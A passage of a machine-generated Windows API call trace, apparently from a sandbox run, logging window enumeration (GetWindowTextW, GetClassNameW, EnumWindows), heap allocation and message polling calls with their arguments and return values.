lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.241] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.241] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.241] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.241] GetWindowTextW (in: hWnd=0x10358, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.241] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.241] GetWindowTextW (in: hWnd=0x10356, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.242] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.242] GetWindowTextW (in: hWnd=0x10354, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.242] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.242] GetWindowTextW (in: hWnd=0x10352, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.242] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.242] GetWindowTextW (in: hWnd=0x10350, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.242] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.242] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.242] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.242] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.243] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.243] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.243] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.243] GetWindowTextW (in: hWnd=0x10348, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.243] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.243] GetWindowTextW (in: hWnd=0x10346, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.243] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.243] GetWindowTextW (in: hWnd=0x20216, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.243] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.244] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.244] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.244] GetWindowTextW (in: hWnd=0x10334, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.244] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.244] GetWindowTextW (in: hWnd=0x10326, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.244] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.244] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.244] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.245] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.245] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.245] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.245] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.245] GetWindowTextW (in: hWnd=0x10312, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.245] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.245] GetWindowTextW (in: hWnd=0x20208, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.245] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.245] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.245] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.246] GetWindowTextW (in: hWnd=0x10278, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.246] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.246] GetWindowTextW (in: hWnd=0x10276, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.246] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.246] GetWindowTextW (in: hWnd=0x10274, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.246] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.246] GetWindowTextW (in: hWnd=0x20202, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.246] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.246] GetWindowTextW (in: hWnd=0x10272, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.247] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.247] GetWindowTextW (in: hWnd=0x10270, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.247] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.247] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.247] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.247] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.247] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.247] GetWindowTextW (in: hWnd=0x10250, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.247] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.247] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.248] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.248] GetWindowTextW (in: hWnd=0x10248, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.248] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.248] GetWindowTextW (in: hWnd=0x10246, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.248] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.248] GetWindowTextW (in: hWnd=0x10238, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.248] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.249] GetWindowTextW (in: hWnd=0x10228, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.249] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.249] GetWindowTextW (in: hWnd=0x10220, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.249] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.249] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.249] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.249] GetWindowTextW (in: hWnd=0x10212, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.249] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.249] GetWindowTextW (in: hWnd=0x10210, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.250] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.250] GetWindowTextW (in: hWnd=0x40194, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.250] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.250] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.250] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.250] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.251] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.251] GetWindowTextW (in: hWnd=0x10190, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.251] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.251] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7deed0, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0121.251] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0121.251] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.251] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.251] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.252] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.252] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.252] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.252] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.252] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.252] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.252] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.253] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.253] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.253] GetWindowTextW (in: hWnd=0x10076, lpString=0x7deed0, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0121.253] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0121.254] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.254] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.254] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919f8 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919f8 | out: hHeap=0x12c0000) returned 1 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.255] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0121.256] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0121.256] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.256] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.256] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.256] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0121.260] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.260] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0121.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff190 | out: hHeap=0x12c0000) returned 1 [0121.261] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff488 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0121.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0121.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.262] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) [0121.262] GetWindowTextW (in: hWnd=0x10128, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.262] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.262] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.262] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0121.262] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.263] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0121.263] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7deed0, nMaxCount=1024 | out: lpString="") returned 0 [0121.263] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7deed0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 